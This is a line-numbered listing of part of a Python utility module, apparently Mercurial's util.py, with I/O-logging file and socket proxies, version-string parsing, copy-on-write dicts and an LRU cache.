479 479 return p.stdin, p.stdout
480 480
481 481 def popen3(cmd, env=None, newlines=False):
482 482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
483 483 return stdin, stdout, stderr
484 484
485 485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
486 486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
487 487 close_fds=closefds,
488 488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
489 489 stderr=subprocess.PIPE,
490 490 universal_newlines=newlines,
491 491 env=env)
492 492 return p.stdin, p.stdout, p.stderr, p
493 493
494 494 class fileobjectproxy(object):
495 495 """A proxy around file objects that tells a watcher when events occur.
496 496
497 497 This type is intended to only be used for testing purposes. Think hard
498 498 before using it in important code.
499 499 """
500 500 __slots__ = (
501 501 r'_orig',
502 502 r'_observer',
503 503 )
504 504
505 505 def __init__(self, fh, observer):
506 506 object.__setattr__(self, r'_orig', fh)
507 507 object.__setattr__(self, r'_observer', observer)
508 508
509 509 def __getattribute__(self, name):
510 510 ours = {
511 511 r'_observer',
512 512
513 513 # IOBase
514 514 r'close',
515 515 # closed if a property
516 516 r'fileno',
517 517 r'flush',
518 518 r'isatty',
519 519 r'readable',
520 520 r'readline',
521 521 r'readlines',
522 522 r'seek',
523 523 r'seekable',
524 524 r'tell',
525 525 r'truncate',
526 526 r'writable',
527 527 r'writelines',
528 528 # RawIOBase
529 529 r'read',
530 530 r'readall',
531 531 r'readinto',
532 532 r'write',
533 533 # BufferedIOBase
534 534 # raw is a property
535 535 r'detach',
536 536 # read defined above
537 537 r'read1',
538 538 # readinto defined above
539 539 # write defined above
540 540 }
541 541
542 542 # We only observe some methods.
543 543 if name in ours:
544 544 return object.__getattribute__(self, name)
545 545
546 546 return getattr(object.__getattribute__(self, r'_orig'), name)
547 547
548 548 def __nonzero__(self):
549 549 return bool(object.__getattribute__(self, r'_orig'))
550 550
551 551 __bool__ = __nonzero__
552 552
553 553 def __delattr__(self, name):
554 554 return delattr(object.__getattribute__(self, r'_orig'), name)
555 555
556 556 def __setattr__(self, name, value):
557 557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558 558
559 559 def __iter__(self):
560 560 return object.__getattribute__(self, r'_orig').__iter__()
561 561
562 562 def _observedcall(self, name, *args, **kwargs):
563 563 # Call the original object.
564 564 orig = object.__getattribute__(self, r'_orig')
565 565 res = getattr(orig, name)(*args, **kwargs)
566 566
567 567 # Call a method on the observer of the same name with arguments
568 568 # so it can react, log, etc.
569 569 observer = object.__getattribute__(self, r'_observer')
570 570 fn = getattr(observer, name, None)
571 571 if fn:
572 572 fn(res, *args, **kwargs)
573 573
574 574 return res
575 575
576 576 def close(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'close', *args, **kwargs)
579 579
580 580 def fileno(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'fileno', *args, **kwargs)
583 583
584 584 def flush(self, *args, **kwargs):
585 585 return object.__getattribute__(self, r'_observedcall')(
586 586 r'flush', *args, **kwargs)
587 587
588 588 def isatty(self, *args, **kwargs):
589 589 return object.__getattribute__(self, r'_observedcall')(
590 590 r'isatty', *args, **kwargs)
591 591
592 592 def readable(self, *args, **kwargs):
593 593 return object.__getattribute__(self, r'_observedcall')(
594 594 r'readable', *args, **kwargs)
595 595
596 596 def readline(self, *args, **kwargs):
597 597 return object.__getattribute__(self, r'_observedcall')(
598 598 r'readline', *args, **kwargs)
599 599
600 600 def readlines(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'readlines', *args, **kwargs)
603 603
604 604 def seek(self, *args, **kwargs):
605 605 return object.__getattribute__(self, r'_observedcall')(
606 606 r'seek', *args, **kwargs)
607 607
608 608 def seekable(self, *args, **kwargs):
609 609 return object.__getattribute__(self, r'_observedcall')(
610 610 r'seekable', *args, **kwargs)
611 611
612 612 def tell(self, *args, **kwargs):
613 613 return object.__getattribute__(self, r'_observedcall')(
614 614 r'tell', *args, **kwargs)
615 615
616 616 def truncate(self, *args, **kwargs):
617 617 return object.__getattribute__(self, r'_observedcall')(
618 618 r'truncate', *args, **kwargs)
619 619
620 620 def writable(self, *args, **kwargs):
621 621 return object.__getattribute__(self, r'_observedcall')(
622 622 r'writable', *args, **kwargs)
623 623
624 624 def writelines(self, *args, **kwargs):
625 625 return object.__getattribute__(self, r'_observedcall')(
626 626 r'writelines', *args, **kwargs)
627 627
628 628 def read(self, *args, **kwargs):
629 629 return object.__getattribute__(self, r'_observedcall')(
630 630 r'read', *args, **kwargs)
631 631
632 632 def readall(self, *args, **kwargs):
633 633 return object.__getattribute__(self, r'_observedcall')(
634 634 r'readall', *args, **kwargs)
635 635
636 636 def readinto(self, *args, **kwargs):
637 637 return object.__getattribute__(self, r'_observedcall')(
638 638 r'readinto', *args, **kwargs)
639 639
640 640 def write(self, *args, **kwargs):
641 641 return object.__getattribute__(self, r'_observedcall')(
642 642 r'write', *args, **kwargs)
643 643
644 644 def detach(self, *args, **kwargs):
645 645 return object.__getattribute__(self, r'_observedcall')(
646 646 r'detach', *args, **kwargs)
647 647
648 648 def read1(self, *args, **kwargs):
649 649 return object.__getattribute__(self, r'_observedcall')(
650 650 r'read1', *args, **kwargs)
651 651
652 652 class observedbufferedinputpipe(bufferedinputpipe):
653 653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654 654
655 655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 656 bypass ``fileobjectproxy``. Because of this, we need to make
657 657 ``bufferedinputpipe`` aware of these operations.
658 658
659 659 This variation of ``bufferedinputpipe`` can notify observers about
660 660 ``os.read()`` events. It also re-publishes other events, such as
661 661 ``read()`` and ``readline()``.
662 662 """
663 663 def _fillbuffer(self):
664 664 res = super(observedbufferedinputpipe, self)._fillbuffer()
665 665
666 666 fn = getattr(self._input._observer, r'osread', None)
667 667 if fn:
668 668 fn(res, _chunksize)
669 669
670 670 return res
671 671
672 672 # We use different observer methods because the operation isn't
673 673 # performed on the actual file object but on us.
674 674 def read(self, size):
675 675 res = super(observedbufferedinputpipe, self).read(size)
676 676
677 677 fn = getattr(self._input._observer, r'bufferedread', None)
678 678 if fn:
679 679 fn(res, size)
680 680
681 681 return res
682 682
683 683 def readline(self, *args, **kwargs):
684 684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685 685
686 686 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 687 if fn:
688 688 fn(res)
689 689
690 690 return res
691 691
692 692 PROXIED_SOCKET_METHODS = {
693 693 r'makefile',
694 694 r'recv',
695 695 r'recvfrom',
696 696 r'recvfrom_into',
697 697 r'recv_into',
698 698 r'send',
699 699 r'sendall',
700 700 r'sendto',
701 701 r'setblocking',
702 702 r'settimeout',
703 703 r'gettimeout',
704 704 r'setsockopt',
705 705 }
706 706
707 707 class socketproxy(object):
708 708 """A proxy around a socket that tells a watcher when events occur.
709 709
710 710 This is like ``fileobjectproxy`` except for sockets.
711 711
712 712 This type is intended to only be used for testing purposes. Think hard
713 713 before using it in important code.
714 714 """
715 715 __slots__ = (
716 716 r'_orig',
717 717 r'_observer',
718 718 )
719 719
720 720 def __init__(self, sock, observer):
721 721 object.__setattr__(self, r'_orig', sock)
722 722 object.__setattr__(self, r'_observer', observer)
723 723
724 724 def __getattribute__(self, name):
725 725 if name in PROXIED_SOCKET_METHODS:
726 726 return object.__getattribute__(self, name)
727 727
728 728 return getattr(object.__getattribute__(self, r'_orig'), name)
729 729
730 730 def __delattr__(self, name):
731 731 return delattr(object.__getattribute__(self, r'_orig'), name)
732 732
733 733 def __setattr__(self, name, value):
734 734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
735 735
736 736 def __nonzero__(self):
737 737 return bool(object.__getattribute__(self, r'_orig'))
738 738
739 739 __bool__ = __nonzero__
740 740
741 741 def _observedcall(self, name, *args, **kwargs):
742 742 # Call the original object.
743 743 orig = object.__getattribute__(self, r'_orig')
744 744 res = getattr(orig, name)(*args, **kwargs)
745 745
746 746 # Call a method on the observer of the same name with arguments
747 747 # so it can react, log, etc.
748 748 observer = object.__getattribute__(self, r'_observer')
749 749 fn = getattr(observer, name, None)
750 750 if fn:
751 751 fn(res, *args, **kwargs)
752 752
753 753 return res
754 754
755 755 def makefile(self, *args, **kwargs):
756 756 res = object.__getattribute__(self, r'_observedcall')(
757 757 r'makefile', *args, **kwargs)
758 758
759 759 # The file object may be used for I/O. So we turn it into a
760 760 # proxy using our observer.
761 761 observer = object.__getattribute__(self, r'_observer')
762 762 return makeloggingfileobject(observer.fh, res, observer.name,
763 763 reads=observer.reads,
764 764 writes=observer.writes,
765 765 logdata=observer.logdata,
766 766 logdataapis=observer.logdataapis)
767 767
768 768 def recv(self, *args, **kwargs):
769 769 return object.__getattribute__(self, r'_observedcall')(
770 770 r'recv', *args, **kwargs)
771 771
772 772 def recvfrom(self, *args, **kwargs):
773 773 return object.__getattribute__(self, r'_observedcall')(
774 774 r'recvfrom', *args, **kwargs)
775 775
776 776 def recvfrom_into(self, *args, **kwargs):
777 777 return object.__getattribute__(self, r'_observedcall')(
778 778 r'recvfrom_into', *args, **kwargs)
779 779
780 780 def recv_into(self, *args, **kwargs):
781 781 return object.__getattribute__(self, r'_observedcall')(
782 782 r'recv_info', *args, **kwargs)
783 783
784 784 def send(self, *args, **kwargs):
785 785 return object.__getattribute__(self, r'_observedcall')(
786 786 r'send', *args, **kwargs)
787 787
788 788 def sendall(self, *args, **kwargs):
789 789 return object.__getattribute__(self, r'_observedcall')(
790 790 r'sendall', *args, **kwargs)
791 791
792 792 def sendto(self, *args, **kwargs):
793 793 return object.__getattribute__(self, r'_observedcall')(
794 794 r'sendto', *args, **kwargs)
795 795
796 796 def setblocking(self, *args, **kwargs):
797 797 return object.__getattribute__(self, r'_observedcall')(
798 798 r'setblocking', *args, **kwargs)
799 799
800 800 def settimeout(self, *args, **kwargs):
801 801 return object.__getattribute__(self, r'_observedcall')(
802 802 r'settimeout', *args, **kwargs)
803 803
804 804 def gettimeout(self, *args, **kwargs):
805 805 return object.__getattribute__(self, r'_observedcall')(
806 806 r'gettimeout', *args, **kwargs)
807 807
808 808 def setsockopt(self, *args, **kwargs):
809 809 return object.__getattribute__(self, r'_observedcall')(
810 810 r'setsockopt', *args, **kwargs)
811 811
812 812 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
813 813 DATA_ESCAPE_MAP.update({
814 814 b'\\': b'\\\\',
815 815 b'\r': br'\r',
816 816 b'\n': br'\n',
817 817 })
818 818 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
819 819
820 820 def escapedata(s):
821 821 if isinstance(s, bytearray):
822 822 s = bytes(s)
823 823
824 824 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
825 825
826 826 class baseproxyobserver(object):
827 827 def _writedata(self, data):
828 828 if not self.logdata:
829 829 if self.logdataapis:
830 830 self.fh.write('\n')
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Simple case writes all data on a single line.
835 835 if b'\n' not in data:
836 836 if self.logdataapis:
837 837 self.fh.write(': %s\n' % escapedata(data))
838 838 else:
839 839 self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
840 840 self.fh.flush()
841 841 return
842 842
843 843 # Data with newlines is written to multiple lines.
844 844 if self.logdataapis:
845 845 self.fh.write(':\n')
846 846
847 847 lines = data.splitlines(True)
848 848 for line in lines:
849 849 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
850 850 self.fh.flush()
851 851
852 852 class fileobjectobserver(baseproxyobserver):
853 853 """Logs file object activity."""
854 854 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
855 855 logdataapis=True):
856 856 self.fh = fh
857 857 self.name = name
858 858 self.logdata = logdata
859 859 self.logdataapis = logdataapis
860 860 self.reads = reads
861 861 self.writes = writes
862 862
863 863 def read(self, res, size=-1):
864 864 if not self.reads:
865 865 return
866 866 # Python 3 can return None from reads at EOF instead of empty strings.
867 867 if res is None:
868 868 res = ''
869 869
870 870 if self.logdataapis:
871 871 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
872 872
873 873 self._writedata(res)
874 874
875 875 def readline(self, res, limit=-1):
876 876 if not self.reads:
877 877 return
878 878
879 879 if self.logdataapis:
880 880 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
881 881
882 882 self._writedata(res)
883 883
884 884 def readinto(self, res, dest):
885 885 if not self.reads:
886 886 return
887 887
888 888 if self.logdataapis:
889 889 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
890 890 res))
891 891
892 892 data = dest[0:res] if res is not None else b''
893 893 self._writedata(data)
894 894
895 895 def write(self, res, data):
896 896 if not self.writes:
897 897 return
898 898
899 899 # Python 2 returns None from some write() calls. Python 3 (reasonably)
900 900 # returns the integer bytes written.
901 901 if res is None and data:
902 902 res = len(data)
903 903
904 904 if self.logdataapis:
905 905 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
906 906
907 907 self._writedata(data)
908 908
909 909 def flush(self, res):
910 910 if not self.writes:
911 911 return
912 912
913 913 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
914 914
915 915 # For observedbufferedinputpipe.
916 916 def bufferedread(self, res, size):
917 917 if not self.reads:
918 918 return
919 919
920 920 if self.logdataapis:
921 921 self.fh.write('%s> bufferedread(%d) -> %d' % (
922 922 self.name, size, len(res)))
923 923
924 924 self._writedata(res)
925 925
926 926 def bufferedreadline(self, res):
927 927 if not self.reads:
928 928 return
929 929
930 930 if self.logdataapis:
931 931 self.fh.write('%s> bufferedreadline() -> %d' % (
932 932 self.name, len(res)))
933 933
934 934 self._writedata(res)
935 935
936 936 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
937 937 logdata=False, logdataapis=True):
938 938 """Turn a file object into a logging file object."""
939 939
940 940 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
941 941 logdata=logdata, logdataapis=logdataapis)
942 942 return fileobjectproxy(fh, observer)
943 943
944 944 class socketobserver(baseproxyobserver):
945 945 """Logs socket activity."""
946 946 def __init__(self, fh, name, reads=True, writes=True, states=True,
947 947 logdata=False, logdataapis=True):
948 948 self.fh = fh
949 949 self.name = name
950 950 self.reads = reads
951 951 self.writes = writes
952 952 self.states = states
953 953 self.logdata = logdata
954 954 self.logdataapis = logdataapis
955 955
956 956 def makefile(self, res, mode=None, bufsize=None):
957 957 if not self.states:
958 958 return
959 959
960 960 self.fh.write('%s> makefile(%r, %r)\n' % (
961 961 self.name, mode, bufsize))
962 962
963 963 def recv(self, res, size, flags=0):
964 964 if not self.reads:
965 965 return
966 966
967 967 if self.logdataapis:
968 968 self.fh.write('%s> recv(%d, %d) -> %d' % (
969 969 self.name, size, flags, len(res)))
970 970 self._writedata(res)
971 971
972 972 def recvfrom(self, res, size, flags=0):
973 973 if not self.reads:
974 974 return
975 975
976 976 if self.logdataapis:
977 977 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
978 978 self.name, size, flags, len(res[0])))
979 979
980 980 self._writedata(res[0])
981 981
982 982 def recvfrom_into(self, res, buf, size, flags=0):
983 983 if not self.reads:
984 984 return
985 985
986 986 if self.logdataapis:
987 987 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
988 988 self.name, size, flags, res[0]))
989 989
990 990 self._writedata(buf[0:res[0]])
991 991
992 992 def recv_into(self, res, buf, size=0, flags=0):
993 993 if not self.reads:
994 994 return
995 995
996 996 if self.logdataapis:
997 997 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
998 998 self.name, size, flags, res))
999 999
1000 1000 self._writedata(buf[0:res])
1001 1001
1002 1002 def send(self, res, data, flags=0):
1003 1003 if not self.writes:
1004 1004 return
1005 1005
1006 1006 self.fh.write('%s> send(%d, %d) -> %d' % (
1007 1007 self.name, len(data), flags, len(res)))
1008 1008 self._writedata(data)
1009 1009
1010 1010 def sendall(self, res, data, flags=0):
1011 1011 if not self.writes:
1012 1012 return
1013 1013
1014 1014 if self.logdataapis:
1015 1015 # Returns None on success. So don't bother reporting return value.
1016 1016 self.fh.write('%s> sendall(%d, %d)' % (
1017 1017 self.name, len(data), flags))
1018 1018
1019 1019 self._writedata(data)
1020 1020
1021 1021 def sendto(self, res, data, flagsoraddress, address=None):
1022 1022 if not self.writes:
1023 1023 return
1024 1024
1025 1025 if address:
1026 1026 flags = flagsoraddress
1027 1027 else:
1028 1028 flags = 0
1029 1029
1030 1030 if self.logdataapis:
1031 1031 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1032 1032 self.name, len(data), flags, address, res))
1033 1033
1034 1034 self._writedata(data)
1035 1035
1036 1036 def setblocking(self, res, flag):
1037 1037 if not self.states:
1038 1038 return
1039 1039
1040 1040 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1041 1041
1042 1042 def settimeout(self, res, value):
1043 1043 if not self.states:
1044 1044 return
1045 1045
1046 1046 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1047 1047
1048 1048 def gettimeout(self, res):
1049 1049 if not self.states:
1050 1050 return
1051 1051
1052 1052 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1053 1053
1054 1054 def setsockopt(self, level, optname, value):
1055 1055 if not self.states:
1056 1056 return
1057 1057
1058 1058 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1059 1059 self.name, level, optname, value))
1060 1060
1061 1061 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1062 1062 logdata=False, logdataapis=True):
1063 1063 """Turn a socket into a logging socket."""
1064 1064
1065 1065 observer = socketobserver(logh, name, reads=reads, writes=writes,
1066 1066 states=states, logdata=logdata,
1067 1067 logdataapis=logdataapis)
1068 1068 return socketproxy(fh, observer)
1069 1069
1070 1070 def version():
1071 1071 """Return version information if available."""
1072 1072 try:
1073 1073 from . import __version__
1074 1074 return __version__.version
1075 1075 except ImportError:
1076 1076 return 'unknown'
1077 1077
1078 1078 def versiontuple(v=None, n=4):
1079 1079 """Parses a Mercurial version string into an N-tuple.
1080 1080
1081 1081 The version string to be parsed is specified with the ``v`` argument.
1082 1082 If it isn't defined, the current Mercurial version string will be parsed.
1083 1083
1084 1084 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1085 1085 returned values:
1086 1086
1087 1087 >>> v = b'3.6.1+190-df9b73d2d444'
1088 1088 >>> versiontuple(v, 2)
1089 1089 (3, 6)
1090 1090 >>> versiontuple(v, 3)
1091 1091 (3, 6, 1)
1092 1092 >>> versiontuple(v, 4)
1093 1093 (3, 6, 1, '190-df9b73d2d444')
1094 1094
1095 1095 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1096 1096 (3, 6, 1, '190-df9b73d2d444+20151118')
1097 1097
1098 1098 >>> v = b'3.6'
1099 1099 >>> versiontuple(v, 2)
1100 1100 (3, 6)
1101 1101 >>> versiontuple(v, 3)
1102 1102 (3, 6, None)
1103 1103 >>> versiontuple(v, 4)
1104 1104 (3, 6, None, None)
1105 1105
1106 1106 >>> v = b'3.9-rc'
1107 1107 >>> versiontuple(v, 2)
1108 1108 (3, 9)
1109 1109 >>> versiontuple(v, 3)
1110 1110 (3, 9, None)
1111 1111 >>> versiontuple(v, 4)
1112 1112 (3, 9, None, 'rc')
1113 1113
1114 1114 >>> v = b'3.9-rc+2-02a8fea4289b'
1115 1115 >>> versiontuple(v, 2)
1116 1116 (3, 9)
1117 1117 >>> versiontuple(v, 3)
1118 1118 (3, 9, None)
1119 1119 >>> versiontuple(v, 4)
1120 1120 (3, 9, None, 'rc+2-02a8fea4289b')
1121 1121 """
1122 1122 if not v:
1123 1123 v = version()
1124 1124 parts = remod.split('[\+-]', v, 1)
1125 1125 if len(parts) == 1:
1126 1126 vparts, extra = parts[0], None
1127 1127 else:
1128 1128 vparts, extra = parts
1129 1129
1130 1130 vints = []
1131 1131 for i in vparts.split('.'):
1132 1132 try:
1133 1133 vints.append(int(i))
1134 1134 except ValueError:
1135 1135 break
1136 1136 # (3, 6) -> (3, 6, None)
1137 1137 while len(vints) < 3:
1138 1138 vints.append(None)
1139 1139
1140 1140 if n == 2:
1141 1141 return (vints[0], vints[1])
1142 1142 if n == 3:
1143 1143 return (vints[0], vints[1], vints[2])
1144 1144 if n == 4:
1145 1145 return (vints[0], vints[1], vints[2], extra)
1146 1146
1147 1147 def cachefunc(func):
1148 1148 '''cache the result of function calls'''
1149 1149 # XXX doesn't handle keywords args
1150 1150 if func.__code__.co_argcount == 0:
1151 1151 cache = []
1152 1152 def f():
1153 1153 if len(cache) == 0:
1154 1154 cache.append(func())
1155 1155 return cache[0]
1156 1156 return f
1157 1157 cache = {}
1158 1158 if func.__code__.co_argcount == 1:
1159 1159 # we gain a small amount of time because
1160 1160 # we don't need to pack/unpack the list
1161 1161 def f(arg):
1162 1162 if arg not in cache:
1163 1163 cache[arg] = func(arg)
1164 1164 return cache[arg]
1165 1165 else:
1166 1166 def f(*args):
1167 1167 if args not in cache:
1168 1168 cache[args] = func(*args)
1169 1169 return cache[args]
1170 1170
1171 1171 return f
1172 1172
1173 1173 class cow(object):
1174 1174 """helper class to make copy-on-write easier
1175 1175
1176 1176 Call preparewrite before doing any writes.
1177 1177 """
1178 1178
1179 1179 def preparewrite(self):
1180 1180 """call this before writes, return self or a copied new object"""
1181 1181 if getattr(self, '_copied', 0):
1182 1182 self._copied -= 1
1183 1183 return self.__class__(self)
1184 1184 return self
1185 1185
1186 1186 def copy(self):
1187 1187 """always do a cheap copy"""
1188 1188 self._copied = getattr(self, '_copied', 0) + 1
1189 1189 return self
1190 1190
1191 1191 class sortdict(collections.OrderedDict):
1192 1192 '''a simple sorted dictionary
1193 1193
1194 1194 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1195 1195 >>> d2 = d1.copy()
1196 1196 >>> d2
1197 1197 sortdict([('a', 0), ('b', 1)])
1198 1198 >>> d2.update([(b'a', 2)])
1199 1199 >>> list(d2.keys()) # should still be in last-set order
1200 1200 ['b', 'a']
1201 1201 '''
1202 1202
1203 1203 def __setitem__(self, key, value):
1204 1204 if key in self:
1205 1205 del self[key]
1206 1206 super(sortdict, self).__setitem__(key, value)
1207 1207
1208 1208 if pycompat.ispypy:
1209 1209 # __setitem__() isn't called as of PyPy 5.8.0
1210 1210 def update(self, src):
1211 1211 if isinstance(src, dict):
1212 1212 src = src.iteritems()
1213 1213 for k, v in src:
1214 1214 self[k] = v
1215 1215
1216 1216 class cowdict(cow, dict):
1217 1217 """copy-on-write dict
1218 1218
1219 1219 Be sure to call d = d.preparewrite() before writing to d.
1220 1220
1221 1221 >>> a = cowdict()
1222 1222 >>> a is a.preparewrite()
1223 1223 True
1224 1224 >>> b = a.copy()
1225 1225 >>> b is a
1226 1226 True
1227 1227 >>> c = b.copy()
1228 1228 >>> c is a
1229 1229 True
1230 1230 >>> a = a.preparewrite()
1231 1231 >>> b is a
1232 1232 False
1233 1233 >>> a is a.preparewrite()
1234 1234 True
1235 1235 >>> c = c.preparewrite()
1236 1236 >>> b is c
1237 1237 False
1238 1238 >>> b is b.preparewrite()
1239 1239 True
1240 1240 """
1241 1241
1242 1242 class cowsortdict(cow, sortdict):
1243 1243 """copy-on-write sortdict
1244 1244
1245 1245 Be sure to call d = d.preparewrite() before writing to d.
1246 1246 """
1247 1247
1248 1248 class transactional(object):
1249 1249 """Base class for making a transactional type into a context manager."""
1250 1250 __metaclass__ = abc.ABCMeta
1251 1251
1252 1252 @abc.abstractmethod
1253 1253 def close(self):
1254 1254 """Successfully closes the transaction."""
1255 1255
1256 1256 @abc.abstractmethod
1257 1257 def release(self):
1258 1258 """Marks the end of the transaction.
1259 1259
1260 1260 If the transaction has not been closed, it will be aborted.
1261 1261 """
1262 1262
1263 1263 def __enter__(self):
1264 1264 return self
1265 1265
1266 1266 def __exit__(self, exc_type, exc_val, exc_tb):
1267 1267 try:
1268 1268 if exc_type is None:
1269 1269 self.close()
1270 1270 finally:
1271 1271 self.release()
1272 1272
1273 1273 @contextlib.contextmanager
1274 1274 def acceptintervention(tr=None):
1275 1275 """A context manager that closes the transaction on InterventionRequired
1276 1276
1277 1277 If no transaction was provided, this simply runs the body and returns
1278 1278 """
1279 1279 if not tr:
1280 1280 yield
1281 1281 return
1282 1282 try:
1283 1283 yield
1284 1284 tr.close()
1285 1285 except error.InterventionRequired:
1286 1286 tr.close()
1287 1287 raise
1288 1288 finally:
1289 1289 tr.release()
1290 1290
1291 1291 @contextlib.contextmanager
1292 1292 def nullcontextmanager():
1293 1293 yield
1294 1294
1295 1295 class _lrucachenode(object):
1296 1296 """A node in a doubly linked list.
1297 1297
1298 1298 Holds a reference to nodes on either side as well as a key-value
1299 1299 pair for the dictionary entry.
1300 1300 """
1301 1301 __slots__ = (u'next', u'prev', u'key', u'value')
1302 1302
1303 1303 def __init__(self):
1304 1304 self.next = None
1305 1305 self.prev = None
1306 1306
1307 1307 self.key = _notset
1308 1308 self.value = None
1309 1309
1310 1310 def markempty(self):
1311 1311 """Mark the node as emptied."""
1312 1312 self.key = _notset
1313 1313
1314 1314 class lrucachedict(object):
1315 1315 """Dict that caches most recent accesses and sets.
1316 1316
1317 1317 The dict consists of an actual backing dict - indexed by original
1318 1318 key - and a doubly linked circular list defining the order of entries in
1319 1319 the cache.
1320 1320
1321 1321 The head node is the newest entry in the cache. If the cache is full,
1322 1322 we recycle head.prev and make it the new head. Cache accesses result in
1323 1323 the node being moved to before the existing head and being marked as the
1324 1324 new head node.
1325 1325 """
1326 1326 def __init__(self, max):
1327 1327 self._cache = {}
1328 1328
1329 1329 self._head = head = _lrucachenode()
1330 1330 head.prev = head
1331 1331 head.next = head
1332 1332 self._size = 1
1333 1333 self._capacity = max
1334 1334
1335 1335 def __len__(self):
1336 1336 return len(self._cache)
1337 1337
1338 1338 def __contains__(self, k):
1339 1339 return k in self._cache
1340 1340
1341 1341 def __iter__(self):
1342 1342 # We don't have to iterate in cache order, but why not.
1343 1343 n = self._head
1344 1344 for i in range(len(self._cache)):
1345 1345 yield n.key
1346 1346 n = n.next
1347 1347
1348 1348 def __getitem__(self, k):
1349 1349 node = self._cache[k]
1350 1350 self._movetohead(node)
1351 1351 return node.value
1352 1352
1353 1353 def __setitem__(self, k, v):
1354 1354 node = self._cache.get(k)
1355 1355 # Replace existing value and mark as newest.
1356 1356 if node is not None:
1357 1357 node.value = v
1358 1358 self._movetohead(node)
1359 1359 return
1360 1360
1361 1361 if self._size < self._capacity:
1362 1362 node = self._addcapacity()
1363 1363 else:
1364 1364 # Grab the last/oldest item.
1365 1365 node = self._head.prev
1366 1366
1367 1367 # At capacity. Kill the old entry.
1368 1368 if node.key is not _notset:
1369 1369 del self._cache[node.key]
1370 1370
1371 1371 node.key = k
1372 1372 node.value = v
1373 1373 self._cache[k] = node
1374 1374 # And mark it as newest entry. No need to adjust order since it
1375 1375 # is already self._head.prev.
1376 1376 self._head = node
1377 1377
1378 1378 def __delitem__(self, k):
1379 1379 node = self._cache.pop(k)
1380 1380 node.markempty()
1381 1381
1382 1382 # Temporarily mark as newest item before re-adjusting head to make
1383 1383 # this node the oldest item.
1384 1384 self._movetohead(node)
1385 1385 self._head = node.next
1386 1386
1387 1387 # Additional dict methods.
1388 1388
1389 1389 def get(self, k, default=None):
1390 1390 try:
1391 1391 return self._cache[k].value
1392 1392 except KeyError:
1393 1393 return default
1394 1394
1395 1395 def clear(self):
1396 1396 n = self._head
1397 1397 while n.key is not _notset:
1398 1398 n.markempty()
1399 1399 n = n.next
1400 1400
1401 1401 self._cache.clear()
1402 1402
1403 1403 def copy(self):
1404 1404 result = lrucachedict(self._capacity)
1405 1405 n = self._head.prev
1406 1406 # Iterate in oldest-to-newest order, so the copy has the right ordering
1407 1407 for i in range(len(self._cache)):
1408 1408 result[n.key] = n.value
1409 1409 n = n.prev
1410 1410 return result
1411 1411
1412 1412 def _movetohead(self, node):
1413 1413 """Mark a node as the newest, making it the new head.
1414 1414
1415 1415 When a node is accessed, it becomes the freshest entry in the LRU
1416 1416 list, which is denoted by self._head.
1417 1417
1418 1418 Visually, let's make ``N`` the new head node (* denotes head):
1419 1419
1420 1420 previous/oldest <-> head <-> next/next newest
1421 1421
1422 1422 ----<->--- A* ---<->-----
1423 1423 | |
1424 1424 E <-> D <-> N <-> C <-> B
1425 1425
1426 1426 To:
1427 1427
1428 1428 ----<->--- N* ---<->-----
1429 1429 | |
1430 1430 E <-> D <-> C <-> B <-> A
1431 1431
1432 1432 This requires the following moves:
1433 1433
1434 1434 C.next = D (node.prev.next = node.next)
1435 1435 D.prev = C (node.next.prev = node.prev)
1436 1436 E.next = N (head.prev.next = node)
1437 1437 N.prev = E (node.prev = head.prev)
1438 1438 N.next = A (node.next = head)
1439 1439 A.prev = N (head.prev = node)
1440 1440 """
1441 1441 head = self._head
1442 1442 # C.next = D
1443 1443 node.prev.next = node.next
1444 1444 # D.prev = C
1445 1445 node.next.prev = node.prev
1446 1446 # N.prev = E
1447 1447 node.prev = head.prev
1448 1448 # N.next = A
1449 1449 # It is tempting to do just "head" here, however if node is
1450 1450 # adjacent to head, this will do bad things.
1451 1451 node.next = head.prev.next
1452 1452 # E.next = N
1453 1453 node.next.prev = node
1454 1454 # A.prev = N
1455 1455 node.prev.next = node
1456 1456
1457 1457 self._head = node
1458 1458
1459 1459 def _addcapacity(self):
1460 1460 """Add a node to the circular linked list.
1461 1461
1462 1462 The new node is inserted before the head node.
1463 1463 """
1464 1464 head = self._head
1465 1465 node = _lrucachenode()
1466 1466 head.prev.next = node
1467 1467 node.prev = head.prev
1468 1468 node.next = head
